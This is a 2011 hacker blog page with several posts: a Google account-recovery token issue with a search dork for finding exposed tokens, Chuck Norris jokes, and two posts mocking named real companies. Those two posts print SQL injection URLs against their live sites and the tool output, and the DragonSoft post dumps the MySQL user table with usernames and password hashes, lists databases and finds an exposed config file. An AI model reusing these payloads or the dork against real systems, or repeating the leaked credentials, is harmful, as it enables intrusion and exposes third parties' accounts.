Showing posts with label LOL. Show all posts
Showing posts with label LOL. Show all posts
Dec 20, 2011

0
Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)

#Title: Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)
#Author: Sandeep Kamble

#Site: http://www.sandeepkamble.com/
#Risk Factor: Low (Why low please read below)
#Attack Type: A User can access B User account Link to remove secondary E-mail address
#Reported Date: OCT 21 , 2011


Overview:
In Google account setting page, when you reset Google account password, it send Reset Password link to your secondary email address. Into that mail there is one more link which can be used remove your secondary email address.
Vulnerability Description:
This Vulnerability can be used to remove secondary email address. In this vulnerability we needed to guess ?C variable token to access the any users account link that can be used to remove secondary email address ?C variable token is generating at sever side so that it is not possible to guess this token and so that it can be performed at victim side only. (Self Exploitation)
Vulnerable Link
Link it has two options, one option is to remove the Secondary and one option to negated email removing operation.
The above like is accessible to everyone. We cannot generate the token number so we can find the token using
Google Dork: Inurul : /AccountDisavow?c=
If you click on the radio button, “No, I didn’t create *******@gmail.com – remove my email address, ********@yahoo.com, from this Google Account. “ and then click continue it will remove the email and delete the link token.
This link will be dead, No one can access it again !
But if you click on the,” Yes, *******@gmail.com is my Google Account. ” and press continue.
When u Click on the this radio button the token is not getting deleted, so that may be pages are indexed into Google
Proof of Concept
POC
POc2
This bug is not qualified by Google because, i tried my best to manage the token vale of ?C but i am failed to manage it :) .
Special thanks to Amol Naik , Anil , veenu bhai
Warm Regards
Sandeep Kamble
www.sandeepkamble.com
Aug 29, 2011

0
WordPress Public Bugs List

Hi to all WP Lovers ... Hope u don't have make a mistake with HP :p
Here are most of vulnerable public wordpress plugins .. so check first inside before u install any ...
 
Link here : ExploitDb
Jul 9, 2011

1
Some New Programers Work

So here are another PHP & MySQL Programmers who offer to hes customers Online Training for $150 ??
But can i ask do u really know php programing language ? i think not well :)

Just looking around on google and find ur services http://indiaebazar.com/deb/prodesc.php?pid=49
and i see u are vulnerable too like others ..

Let Me Tell u Something About Ur Site ;)

[+] URL:http://indiaebazar.com/deb/prodesc.php?pid=49+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] Gathering MySQL Server Configuration...
    Database: indiaeba_ebazar
    User: indiaeba_ebauser@localhost
    Version: 5.0.92-community

[+] Do we have Access to MySQL Database: No

[+] Do we have Access to Load_File: No

[-] [14:34:01]
[-] Total URL Requests 3
[-] Done

This shit it's not allowed to u .. So first u need to learn vuln patching .i don't have anything with u guys just wanna to show to u something :)
Maybe u are good in php but u first need to learn about Security :)

2
Chuck Norris Linux ( We are secured )

Why Linux doesn’t have any viruses? Because Chuck Norris uses it!

A Linux designed by Chuck Norris would require no backups, as it would be too scared of Chuck to fail.

CPUs run faster to get away from Chuck Norris

If Chuck Norris wrote Linux, the kernel would always panic.

If Chuck Norris wrote Linux it would be called Chux and you would literally need to boot it.

Actually…. if Chuck Norris wrote Linux, you couldn’t boot it, it would boot you.

Chux doesn’t have disk latency because the hard drive knows to hurry the hell up.

Chux need no antivirus… viruses need anti-Chux.

Chuck Norris plays 3D games in his head by interpreting the source code in real-time.

Chux does not connect to servers. Servers beg permission to connect to Chux.

Chuck Norris binary: all 1’s

Web pages on a Chux server are handled perfectly by IE6. No one dares question why.

With Chux, “sudo” is assumed.

Chux cronjobs run whenever they decide to run!

Regardless of size, ALL computers running Chux are Supercomputers

Chuck Norris put the “ch” in “chmod” to remind us that he owns everything.

When Chuck Norris types ’sudo’ he automatically becomes superuser for every Linux server in existence.

#! is the last thing you remember hearing after booting up Chux, because of the Round House Kick start bootloader.

Chux can divide by zero.

Chux needs no browser because it holds the entire contents of the Internet in memory at all times.

There is no server version of Chux. Chuck serves no one.

If Chuck wrote Linux, developers would not be able to write bugs, bugs would be too scared to exist on chux.

When Chuck Norris gives you the finger, he’s telling you how many seconds you have left to live.

Chuck Norris once bowled a 300. Without a ball. He wasn’t even in a bowling alley.

Superman owns a pair of Chuck Norris pajamas.

Once a cobra bit Chuck Norris’ leg. After five days of excruciating pain, the cobra died.

Chuck Norris counted to infinity - twice.

Chuck Norris’ calendar goes straight from March 31st to April 2nd; no one fools Chuck Norris

Chuck Norris can slam revolving doors.

Chuck Norris can do a wheelie on a unicycle.

Chuck Norris can speak braille.

If you spell Chuck Norris wrong on Google it doesn’t say, “Did you mean Chuck Norris?” It simply replies, “Run while you still have the chance.”

Chuck Norris can kill two stones with one bird.

Death once had a near-Chuck-Norris experience.

Bill Gates lives in constant fear that Chuck Norris’ PC will crash.

Chuck Norris can strangle you with a cordless phone.

Chuck Norris can build a snowman out of rain.

Chuck Norris once won a game of Connect Four in 3 moves.

In 1991, Chuck Norris shot a 14 on an 18 hole golf course, falling short of his personal best by 2 strokes.

Champions are the breakfast of Chuck Norris.

If you can see Chuck Norris, he can see you.

If you can’t see Chuck Norris you may be only seconds away from death.

-----------
May 28, 2011

0
DragonSoft Epic Fail :(

Lol a funny site who offer to hes clients protection from attacking sites like SQL Injection , XSS , BoF etc ...
but relly why not have secure hes site :( Ohh noo
And nice logo

So DragonSoft say :

http://www.dragonsoft.com/product/01.php

What is DragonWAF ?


DragonWAF is a host-based web application firewall using filtration algorithms, it targets to filter and prevent malicious coding attacks and defacements aiming at personal, SMB and corporate web sites that are hosted on Microsoft IIS Web Servers. The attack patterns and sources are recorded despite the encryption status of the attacking word strings, DragonWAF records by date, incoming IP addresses, attack types. The data are transformed into graphical reports which allows web masters to take easy control and security managements on their IIS Web Servers.

Best Web Server Protection Solution for SMB

DragonWAF proactively filter all known and unknown vulnerability attacks, protect web server security. DragonSoft offers best reasonable price package to SMB websites against malicious attacks and web defacements.


  • Website malicious attack & injection filtration
  • Customizable Remote Warning Page
  • SQL Injection Prevention
  • Buffer Overflow Protection
  • OWASP/PCI-DSS 6.6 compliant
  • Shellcode Exploits Prevention
  • HTTP Allowed Methods Prevention
  • Encoding Attack Prevention
  • Directory Traversal Prevention
  • Keyword Strings Filtration
  • Cross Site Scripting, (XSS) Attack Prevention
  • AJAX Attack Prevention
  • X Path Attack Prevention
  • XML Attack Prevention
  • Allow Directory Prevention
  • Support SSL websites

------------------------
But Not really 

Let me tell something :)

Bigies Fail 


[+] URL: http://www.dragonsoft.com/events/list.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,5,6
[+] 22:45:00
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Gathering MySQL Server Configuration...
 Database: dragonsoft
 User: www@192.168.0.201
 Version: 5.1.47-log

[+] Do we have Access to MySQL Database: YES <-- w00t w00t

[+] Dumping MySQL user info. host:user:password[+] Number of users in the mysql.user table: 16
[0] localhost:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[1] test.dragonsoft:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[2] 127.0.0.1:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[3] 192.168.0.%:www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD
[4] localhost:webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E
[5] localhost:www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD
[6] localhost:dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18
[7] 192.168.0.%:kay:*B0AC41A8F1A5FB7AC4A313B1A4A65F3038A343C5
[8] 192.168.0.%:george:*6B05113CA60CA58DD62D7ED34941F68C6968B108
[9] 192.168.0.%:linus:*F1854B79E7636559FC27CB27AEFAF100B556DCBD
[10] 192.168.0.%:webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E
[11] 192.168.0.%:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[12] 192.168.0.%:repl:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD
[13] 192.168.0.%:walter:*BDF7F6F2BF488168D5B4C2C87DB50FF1863B1E4D
[14] localhost:tony:*47318AF21EAB59984F5D7599F76191B6F4C32B7E
[15] 192.168.0.%:tony:*C617F3F58E152DBD282903477F1B5CAA255F0C10

[+] Showing all databases current user has access too!
[+] Number of Databases: 13

[1]  A-VAC 
[2]  calendar 
[3]  dragonsoft 
[4]  ds 
[5]  dsdz 
[6]  mysql 
[7]  order 
[8]  phpwind 
[9]  smb_reg 
[10]  test 
[11]  waf 
[12]  wp_reg 
[13]  wp_reg_old 

[-] [22:45:30]
[-] Total URL Requests: 20
[-] Done

Scanning for any admin folder or file but nothing
[ + ] URL : http://www.dragonsoft.com/

[ + ] Date: Sat May 28 22:56:31 2011

[ + ] Scanning. . . . .


http://www.dragonsoft.com/file   --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/include   --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/js   --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/css   --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/doc   --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/config.php   --------> ( 200 OK ) -- (  )
[ + ] Done ! - End Scanning !

*-----------------------------------------------------------------------------*
How this is Posible ? All users of mysql and easy SQLi Injection Not protected with any Fucking WAF ..
     
    FlashcRew Blog